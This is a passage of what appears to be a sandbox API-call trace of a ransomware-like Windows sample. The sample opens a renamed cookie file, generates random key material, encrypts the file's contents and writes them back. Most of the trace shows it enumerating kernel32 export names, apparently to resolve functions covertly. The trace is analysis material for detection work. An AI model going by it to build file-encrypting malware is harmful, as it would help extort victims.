(lpString="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ") returned 47 [0181.670] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.670] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ" [0181.670] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.673] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6ighlz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.673] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=536) returned 1 [0181.674] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.674] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.674] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.674] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.674] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.674] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.675] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.675] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.675] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.675] CloseHandle (hObject=0x288) returned 1 [0181.676] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.676] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.677] CloseHandle (hObject=0x0) returned 0 [0181.677] CloseHandle (hObject=0x284) returned 1 [0181.677] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.677] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.677] GetTickCount () returned 0x1134cf8 [0181.677] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.678] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.678] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.678] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.678] lstrlenA (lpString="kernel32.dll") returned 12 [0181.678] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.678] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.678] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.678] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.678] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.678] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.678] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.678] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.678] lstrlenA (lpString="ADDATOMA") returned 8 [0181.678] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.678] lstrlenA (lpString="ADDATOMW") returned 8 [0181.678] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.678] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.678] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.679] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.679] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.679] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.679] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.679] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.679] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.679] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.679] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.679] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.679] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.679] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.679] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.679] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.679] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.679] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.679] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.679] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.679] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.680] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.680] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.680] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.680] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.680] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.680] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.680] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.680] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.680] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.680] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.680] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.680] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.680] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.680] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.680] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.680] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.680] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.680] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.680] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.681] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.681] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.681] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.681] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.681] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.681] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.681] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.681] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.681] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.681] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.681] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.681] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.681] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.681] lstrlenA (lpString="BEEP") returned 4 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.681] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.681] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.681] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.682] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.682] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.682] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.682] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.682] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.682] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.682] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.682] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.682] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.682] lstrlenA (lpString="CANCELIO") returned 8 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.682] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.682] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.682] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.682] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.682] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.682] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.682] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.682] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.682] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.683] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.683] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.683] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.683] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.683] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.683] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.683] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.683] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.683] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.683] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.683] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.683] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.683] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.683] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.683] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.683] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.683] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.683] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.684] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.684] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.684] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.684] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.684] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.684] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.684] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.684] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.684] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") 